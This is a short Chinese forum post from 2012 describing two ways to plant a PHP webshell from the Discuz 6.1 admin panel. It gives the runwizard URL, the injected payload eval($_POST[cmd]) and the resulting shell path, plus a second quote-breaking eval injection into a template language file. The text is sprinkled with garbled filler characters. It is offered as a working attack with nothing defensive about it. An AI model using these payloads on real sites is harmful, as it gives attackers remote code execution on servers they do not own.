discuz6.1两种方法后台拿shell
9 I; r# x& E8 `, S好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下: v0 n: }! H& S$ {
1:
3 n, W; }# g5 N( c* U' vhttp://127.0.0.1/discuz/admincp. ... zard&frames=yes
# V3 i- Z8 M- o1 q7 V" Q4 R; ^/ zadmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell" v N2 m: w: p- E, o9 P
<?php eval($_POST[cmd]);?>% g! C# L0 W; G$ u& K, {) A7 x
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php; s7 o) j2 _) S
4 @$ i0 w' ?" K
! ]1 e! w" c5 \- i
2:后台模板管理--默认模板套系--详情& f% S) t; U5 E; e! R. N
templates/default/actions.lang.php
4 l# D- A0 c# V! V3 g( F1 E# f' Qjhackj\\');eval($_POST[cmd])?>;//
7 H0 [' x! W1 z% M% X; n! {
$ g3 |" p7 _: I利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对